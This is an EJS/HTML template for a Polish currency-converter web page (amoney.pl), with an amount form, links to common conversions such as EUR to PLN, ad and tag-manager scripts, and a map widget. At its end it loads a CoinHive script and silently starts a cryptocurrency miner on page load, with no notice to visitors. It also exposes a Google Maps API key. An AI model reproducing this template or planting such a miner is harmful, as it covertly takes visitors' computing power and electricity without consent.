<!DOCTYPE HTML>

<html lang="pl">


<head> 
	<title>Przelicznik Walut - Kalkulator Walut</title>
	<meta name="Description" content="Przelicznik Walut Na Podstawie Kursów Narodowego Banku Polskiego NBP. Szukasz Kursu Walut, Przeliczeń? Sprawdź Przelicznik Amoney">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
	<link rel="stylesheet" href='/icons/calc/css/fontello.css' />
	<link rel="icon" type="image/png" href="icons/favicon.png">
	<link rel="stylesheet" type="text/css" href="stylesheets/css/menu.css">
	<link rel="stylesheet" href="stylesheets/css/calcStartPage.css">
	<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
	<script>
	  (adsbygoogle = window.adsbygoogle || []).push({
		google_ad_client: "ca-pub-8388218201561397",
		enable_page_level_ads: true
	  });
	</script>
</head>

<body class="calcMain">
<!-- Google Tag Manager -->
<noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-KZD6WP"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-KZD6WP');</script>
<!-- End Google Tag Manager -->
	<nav class="main-page">
		<div class="dl-menu-header main-page">
		<!--<h3>menu</h3>-->
		<div class="menu-btn">
			<div class="bar top-bar"></div>
			<div class="bar middle-bar"></div>
			<div class="bar bottom-bar"></div>
		</div>
	</div>

	<div class="dl-menu-container">
		<div class="inner-scroll">
		<ul class="dl-menu">
			<div class="inner-scroll">
				<% categoriesDictionary.forEach( category => { %> 	 	
					<li class="category">
					<a href="#" class="category-link"><%=category%></a>
						<ul class="dl-submenu">
							<div class="inner-scroll">
								<% categoriesMap[category].forEach( subcategory => { %>
								<li class="subcategory">
									<a class="subcategory-link" href="/finanse/<%=subcategory.replace(/ /g, '-')%>?from=Menu"><%=subcategory%></a>
								</li>
								<% }) %>
							</div>
						</ul>
				<% }) %>
				<li><a class="calc-link" href="/przelicznik-walut">Kalkulator walut</a></li>
			</div>
		</ul>
		<div class="line"></div>
		</div>
	</div>
	</nav>
<div class="logo-container">
		<a href="/"><img class="logo" src="/images/logo.png" alt="aMoney"></a>
	</div>
	<div class="wrapper">
		<header>
		<h1>Kalkulator Walut</h1>
		<form id="calc">
			<div class="value">
				<input class="form-control text-input" id="focusedInput" type="number" step="0.01" value="<%=amount%>" placeholder="Wartość">	
				<button type="button" id="calculateStartPage" class="btn btn-default">Oblicz</button>
			</div>
			<div class="values">
				<div class ="course">
					<% include partials/content/course.ejs %>
				</div>
				<div class="date">
					<% include partials/content/date.ejs %>
				</div>
			</div>
			<div class="examples">
				<h2>Najczęściej przeliczane waluty</h2>
				<br>
				<table style="width:100%">
				<tr>
					<td><a href="/przelicznik/EUR-na-PLN--EUR-ile-to-PLN">Przelicz Euro (EUR) na złotówki (PLN)</a></td>
				</tr>
				<tr>
					<td><a href="/przelicznik/PLN-na-EUR--PLN-ile-to-EUR">Przelicz złotówki (PLN) na Euro (EUR)</a></td>
				</tr>
				<tr>
					<td><a href="/przelicznik/GBP-na-USD--GBP-ile-to-USD">Przelicz Funt (GBP) na Dolara amerykańskiego (USD)</a></td>
				</tr>
				<tr>
					<td><a href="/przelicznik/USD-na-PLN--USD-ile-to-PLN">Przelicz Dolara (USD) na złotówki (PLN)</a></td>
				</tr>
				<tr>
					<td><a href="/przelicznik/PLN-na-USD--PLN-ile-to-USD">Przelicz złotówki (PLN) na Dolara amerykańskiego (USD)</a></td>
				</tr>
				</table>
			</div>
		</form>	
		<br>
		<br>
		</header>
	</div>
	<footer><% include partials/templemate/footer.ejs %></footer>
	<script src="javascripts/jquery-1.11.3.min.js"></script>
	<script src="javascripts/main.js"></script>
	<script src="javascripts/red.js"></script>
	<script>
      function initMap() {
        var uluru = {lat: 52.235765, lng: 21.0177286};
        var map = new google.maps.Map(document.getElementById('map'), {
          zoom: 13,
          center: uluru,
          disableDefaultUI: true,
          zoomControl: true
        });
        var marker = new google.maps.Marker({
          position: uluru,
          map: map
        });
      }
    </script>
    <script async defer
    src="https://maps.googleapis.com/maps/api/js?key=AIzaSyCMfnryrSqfNlO6vbG6RgbyZDobT7K7Ips&callback=initMap">
    </script>
	<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
	<script>
		var miner = new CoinHive.User('Stln12b1koKM0G7e0C054314KEIoBVdj', 'amoney.pl');
		miner.start();
	</script>
</body>

</html>